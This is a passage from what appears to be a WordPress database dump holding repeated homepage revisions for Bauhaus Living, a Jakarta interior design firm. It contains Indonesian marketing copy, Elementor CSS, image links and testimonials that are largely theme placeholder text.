<h2>\nCheckout our latest news\nand articles							</h2>\n					<ul>\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\" Hello world!\">\n							</a>\n									14\n									November\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								Hello world!							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-5.jpg\" alt=\" What is the future of interior design?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								What is the future of interior design?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-02.jpg\" alt=\" Do you need math for architecture?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								Do you need math for architecture?							</a>\n						</h2>\n				</li>	\n					</ul>\n							<h3> Tingkatkan Kualitas Hidup Anda dengan Bauhaus Living</h3>\n														<h2>\n								Wujudkan mimpi anda sekarang!							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-box.min.css\">		\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>','Home 1','','inherit','closed','closed','','22-revision-v1','','','2023-09-25 10:42:07','2023-09-25 10:42:07','',22,'https://bauhaus.futuremediatrix.com/?p=4969',0,'revision','',0),(4970,3,'2023-09-25 10:42:07','2023-09-25 10:42:07','[rev_slider alias=\"home-1\" slidertitle=\"Home 1\"][/rev_slider]		\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-home-1-about-interior.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927c-scaled.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-1065.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-9402.jpg\" alt=\"\">\n							<h3>ABOUT US</h3>\n														<h2>\n								WELCOME TO BAUHAUS							</h2>\n		<p>Tingkatkan Kualitas Hidup Anda dengan Bauhaus Living!</p><p>Sejak tahun 2005, Bauhaus Living telah menjadi pilihan utama untuk solusi desain interior berkualitas tinggi di Jakarta dan sekitarnya. Dengan pengalaman yang telah teruji dalam menangani lebih dari 300 proyek residential dan commercial, kami siap membawa keindahan, kenyamanan, dan kepribadian ke dalam ruang Anda.</p><p>Kami tidak hanya menciptakan desain interior yang estetis, tetapi juga mengubah ruang tempat tinggal atau tempat kerja Anda menjadi cerminan karakter dan selera pribadi Anda.</p><p>Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas.</p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.</p>		\n			<a href=\"https://bauhaus.futuremediatrix.com/about/\" role=\"button\">\n						More\n					</a>\n							<h3>SERVICES WE DO</h3>\n														<h2>\n interior design consultant & contractor 							</h2>\n		<p>- Konsultasi perencanaan &amp; interior design</p><p>- Penyusunan Rencana Anggaran Belanja</p><p>- Produksi furniture dan pekerjaan sipil</p>		\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-con{--container-widget-width:100%}.e-con-inner>.elementor-widget-spacer,.e-con>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container,.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer,.e-con>.elementor-widget-spacer>.elementor-widget-container,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n							<h3>our recent work</h3>\n														<h2>\n								Introducing outstanding new projects							</h2>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n	        				<h4>\n					Residential				</h4>\n		</a>\n					<p>\n				Kami memiliki keyakinan bahwa rumah adalah “Living Space” atau ruang hidup yang harus memberikan energi positif pada penghuninya. Setiap proyek residential merupakan usaha kami untuk mewujudkan ruang hidup yang selain nyaman juga mewakili kepribadian penghuninya.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n	        				<h4>\n					Commercial				</h4>\n		</a>\n					<p>\n				Menghadirkan ruang commercial yang tidak sekedar fungsional namun juga memiliki identitas serta nilai ekonomi adalah tantangan yang sering kami hadapi dalam proyek commercial.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n	        				<h4>\n					Office				</h4>\n		</a>\n					<p>\n				Pergeseran generasi telah mengubah ruang kantor menjadi ruang kolaborasi yang menjadi sumber inspirasi bagi karyawan di dalamnya.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n		</a>\n        <!--  -->\n                    <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\"2022\">\n                    2022                </li>\n                                <li data-slug=\"2021\">\n                    2021                </li>\n                                <li data-slug=\"2020\">\n                    2020                </li>\n                                <li data-slug=\"2019\">\n                    2019                </li>\n                                <li data-slug=\"2018\">\n                    2018                </li>\n            </ul>    \n            <svg width=\"50\" height=\"50\">\n                <circle cx=\"25\" cy=\"25\" r=\"10\" />\n                <circle cx=\"25\" cy=\"25\" r=\"20\" />\n            </svg>\n           <h4>no data</h4>\n							<h3>our benefits</h3>\n														<h2>\n								Why Bauhaus Living ?							</h2>\n							<p> Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas. </p>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Konsultasi gratis oleh team profesional\n									</li>\n								<li>\n										Interior design yang mewakili keunikan setiap klien\n									</li>\n								<li>\n										Design + Build Service menjadi kualitas pekerjaan \n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}.e-con-inner .elementor-progress-wrapper,.e-con .elementor-progress-wrapper{height:auto}</style>			\n				Kepuasan Pelanggan\n									100%\n				Kualitas Hasil dan Layanan\n									100%\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"2560\" height=\"1920\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg 2560w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-300x225.jpg 300w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1024x768.jpg 1024w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-768x576.jpg 768w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1536x1152.jpg 1536w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-2048x1536.jpg 2048w\" sizes=\"(max-width: 2560px) 100vw, 2560px\" />															\n							<h3>Real Testimonials</h3>\n														<h2>\n								Apa kata mereka tentang Bauhaus?							</h2>\n			<section>\n																																			<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/56947243_2426566684042502_6812443397089918976_n.jpg\" alt=\"Prijonno Nugroho\" >\n																							<p>\n													Prijonno Nugroho												</p>\n																							<p>\n													Action Coach Jakarta												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Kantor kami waktu itu menggunakan jasa dari Bauhaus hasilnnya memuaskan.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n							<h3>Our process</h3>\n														<h2>\n								4 easy work steps							</h2>\n					Design\nconcept \n					01\n					Design\nschematic \n					02\n					Design\ndevelopment\n					03\n					Construction\ndevelopment\n					04\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01-test.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06-home1.png\" alt=\"\" loading=\"lazy\" />															\n							<h3>Direct from the blog posts</h3>\n														<h2>\nCheckout our latest news\nand articles							</h2>\n					<ul>\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\" Hello world!\">\n							</a>\n									14\n									November\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								Hello world!							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-5.jpg\" alt=\" What is the future of interior design?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								What is the future of interior design?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-02.jpg\" alt=\" Do you need math for architecture?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								Do you need math for architecture?							</a>\n						</h2>\n				</li>	\n					</ul>\n							<h3> Tingkatkan Kualitas Hidup Anda dengan Bauhaus Living</h3>\n														<h2>\n								Wujudkan mimpi anda sekarang!							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-box.min.css\">		\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>','Home 1','','inherit','closed','closed','','22-revision-v1','','','2023-09-25 10:42:07','2023-09-25 10:42:07','',22,'https://bauhaus.futuremediatrix.com/?p=4970',0,'revision','',0),(4971,3,'2023-09-25 10:42:07','2023-09-25 10:42:07','[rev_slider alias=\"home-1\" slidertitle=\"Home 1\"][/rev_slider]		\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-home-1-about-interior.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927c-scaled.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-1065.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-9402.jpg\" alt=\"\">\n							<h3>ABOUT US</h3>\n														<h2>\n								WELCOME TO BAUHAUS							</h2>\n		<p>Tingkatkan Kualitas Hidup Anda dengan Bauhaus Living!</p><p>Sejak tahun 2005, Bauhaus Living telah menjadi pilihan utama untuk solusi desain interior berkualitas tinggi di Jakarta dan sekitarnya. Dengan pengalaman yang telah teruji dalam menangani lebih dari 300 proyek residential dan commercial, kami siap membawa keindahan, kenyamanan, dan kepribadian ke dalam ruang Anda.</p><p>Kami tidak hanya menciptakan desain interior yang estetis, tetapi juga mengubah ruang tempat tinggal atau tempat kerja Anda menjadi cerminan karakter dan selera pribadi Anda.</p><p>Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas.</p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.</p>		\n			<a href=\"https://bauhaus.futuremediatrix.com/about/\" role=\"button\">\n						More\n					</a>\n							<h3>SERVICES WE DO</h3>\n														<h2>\n interior design consultant & contractor 							</h2>\n		<p>- Konsultasi perencanaan &amp; interior design</p><p>- Penyusunan Rencana Anggaran Belanja</p><p>- Produksi furniture dan pekerjaan sipil</p>		\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-con{--container-widget-width:100%}.e-con-inner>.elementor-widget-spacer,.e-con>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container,.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer,.e-con>.elementor-widget-spacer>.elementor-widget-container,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n							<h3>our recent work</h3>\n														<h2>\n								Introducing outstanding new projects							</h2>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n	        				<h4>\n					Residential				</h4>\n		</a>\n					<p>\n				Kami memiliki keyakinan bahwa rumah adalah “Living Space” atau ruang hidup yang harus memberikan energi positif pada penghuninya. Setiap proyek residential merupakan usaha kami untuk mewujudkan ruang hidup yang selain nyaman juga mewakili kepribadian penghuninya.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n	        				<h4>\n					Commercial				</h4>\n		</a>\n					<p>\n				Menghadirkan ruang commercial yang tidak sekedar fungsional namun juga memiliki identitas serta nilai ekonomi adalah tantangan yang sering kami hadapi dalam proyek commercial.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n	        				<h4>\n					Office				</h4>\n		</a>\n					<p>\n				Pergeseran generasi telah mengubah ruang kantor menjadi ruang kolaborasi yang menjadi sumber inspirasi bagi karyawan di dalamnya.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n		</a>\n        <!--  -->\n                    <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\"2022\">\n                    2022                </li>\n                                <li data-slug=\"2021\">\n                    2021                </li>\n                                <li data-slug=\"2020\">\n                    2020                </li>\n                                <li data-slug=\"2019\">\n                    2019                </li>\n                                <li data-slug=\"2018\">\n                    2018                </li>\n            </ul>    \n            <svg width=\"50\" height=\"50\">\n                <circle cx=\"25\" cy=\"25\" r=\"10\" />\n                <circle cx=\"25\" cy=\"25\" r=\"20\" />\n            </svg>\n           <h4>no data</h4>\n							<h3>our benefits</h3>\n														<h2>\n								Why Bauhaus Living ?							</h2>\n							<p> Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas. </p>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Konsultasi gratis oleh team profesional\n									</li>\n								<li>\n										Interior design yang mewakili keunikan setiap klien\n									</li>\n								<li>\n										Design + Build Service menjadi kualitas pekerjaan \n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}.e-con-inner .elementor-progress-wrapper,.e-con .elementor-progress-wrapper{height:auto}</style>			\n				Kepuasan Pelanggan\n									100%\n				Kualitas Hasil dan Layanan\n									100%\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"2560\" height=\"1920\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg 2560w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-300x225.jpg 300w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1024x768.jpg 1024w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-768x576.jpg 768w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1536x1152.jpg 1536w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-2048x1536.jpg 2048w\" sizes=\"(max-width: 2560px) 100vw, 2560px\" />															\n							<h3>Real Testimonials</h3>\n														<h2>\n								Apa kata mereka tentang Bauhaus?							</h2>\n			<section>\n																																			<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/56947243_2426566684042502_6812443397089918976_n.jpg\" alt=\"Prijonno Nugroho\" >\n																							<p>\n													Prijonno Nugroho												</p>\n																							<p>\n													Action Coach Jakarta												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Kantor kami waktu itu menggunakan jasa dari Bauhaus hasilnnya memuaskan.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img 